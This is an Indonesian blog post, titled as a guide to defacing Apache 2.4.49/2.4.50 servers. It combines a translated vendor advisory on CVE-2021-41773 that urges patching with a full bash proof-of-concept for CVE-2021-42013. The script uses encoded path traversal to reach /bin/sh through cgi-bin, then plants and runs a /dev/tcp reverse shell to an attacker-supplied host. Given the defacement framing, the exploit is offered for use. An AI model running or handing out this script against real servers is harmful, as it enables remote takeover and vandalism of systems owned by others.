Cara Deface Apache 2.4.49 dan 2.4.50 | Exploit CVE-2021-41773 RCE Path Traversal

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.

 Kerentanan Apache memungkinkan RCE dan Path Traversal



5 Oktober, CVE-2021-41773 membuat putaran melalui berita, blogosphere dan twitterverse. Kami sekarang melihat POC publik (bukti konsep) menunjukkan bagaimana mengeksploitasi masalah ini. Harap perhatikan kerentanan ini!

Server yang menjalankan Apache 2.4.49 dan 2.4.50 mungkin terkena eksekusi kode jarak jauh (RCE) dan jalur traversal. RCE akan memungkinkan penyerang menjalankan perintah di server Anda. Lintasan jalur akan memungkinkan penyerang mengakses data dan file yang seharusnya tidak dapat mereka akses. Paparan penuh tergantung pada konfigurasi, tetapi banyak sistem yang menghadapi Internet rentan.

Masalah semacam ini membuat banyak orang bertanya-tanya, "apakah saya rentan?" Kecerdasan Pure Signal™ Team Cymru membantu menjawab pertanyaan itu!

Data Open Ports kami mencatat informasi versi pada sistem yang menghadap Internet. Dalam kumpulan data ini, Anda dapat melihat detail tentang string versi, spanduk, daemon, dan layanan. Untuk kerentanan ini, kami menjalankan kueri untuk “*Apache/2.4.49*” untuk menemukan versi Apache yang dimaksud.

Prevalensi geografis kerentanan Apache

Apa yang ditunjukkan ini? Kami melihat 25.503 sistem menjalankan Apache versi 2.4.49 sekarang atau baru-baru ini. Sistem ini, dan sistem yang menjalankan 2.4.50, harus ditambal ke versi 2.4.51, sesuai rekomendasi Apache. Kami tidak mencoba untuk mengkonfirmasi POC bekerja melawan sistem ini.

Apa yang kami lakukan dengan data ini? Tim Cymru ada untuk menyelamatkan dan meningkatkan kehidupan manusia. Sebelum menulis surat ini, kami membagikan hasil kami dengan beberapa kelompok.

Kami tidak dapat menjangkau operator sistem individu, tetapi kami melakukan apa yang kami bisa. Dalam komunitas pakar yang kami kenal, kami mengirimkan daftar untuk membantu mereka memfokuskan tim mereka pada patching. Kami telah melakukan ini selama beberapa dekade, dan kami akan terus melakukannya selalu.


# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)

# Credits: Ash Daulton & cPanel Security Team

# Date: 24/07/2021

# Exploit Author: TheLastVvV.com

# Vendor Homepage:  https://apache.org/

# Version: Apache 2.4.50 with CGI enable

# Tested on : Debian 5.10.28

# CVE : CVE-2021-42013


#!/bin/bash


echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'

if [ $# -eq 0 ]

then

echo  "try: ./$0 http://ip:port LHOST LPORT"

exit 1

fi

curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash  /tmp/revoshell.sh"


#usage chmod -x CVE-2021-42013.sh

#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

Artikel Terbaru